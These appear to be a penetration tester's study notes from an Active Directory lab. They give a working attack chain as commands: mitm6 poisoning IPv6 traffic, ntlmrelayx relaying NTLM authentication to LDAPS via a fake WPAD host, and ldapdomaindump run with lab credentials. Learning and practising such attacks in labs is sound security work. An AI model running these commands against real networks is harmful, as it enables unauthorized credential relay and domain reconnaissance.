1️⃣ ntlmrelayx (LDAP Relay Attack)

2️⃣ ldapdomaindump (Manual AD Enumeration)

🛠 When to Use Each Tool?

Scenario Use ntlmrelayx Use ldapdomaindump
You have relayed NTLM auth via mitm6 ✅ Yes ❌ No
You have valid AD credentials ❌ No ✅ Yes
You want to automatically capture AD info ✅ Yes ❌ No
You want detailed AD enumeration ❌ No ✅ Yes

🔥 Attack Chain

  1. Use mitm6 to poison IPv6 traffic

    sudo mitm6 -d marvel.local
    
  2. Run ntlmrelayx to capture authentication and dump AD info

    impacket-ntlmrelayx -6 -t ldaps://192.168.150.128 -wh fakewpad.marvel.local -l lootme
    
  3. If you have valid AD creds, use ldapdomaindump for further enumeration

    python3 -m ldapdomaindump ldaps://192.168.150.128 -u 'MARVEL\\fcastle' -p Password1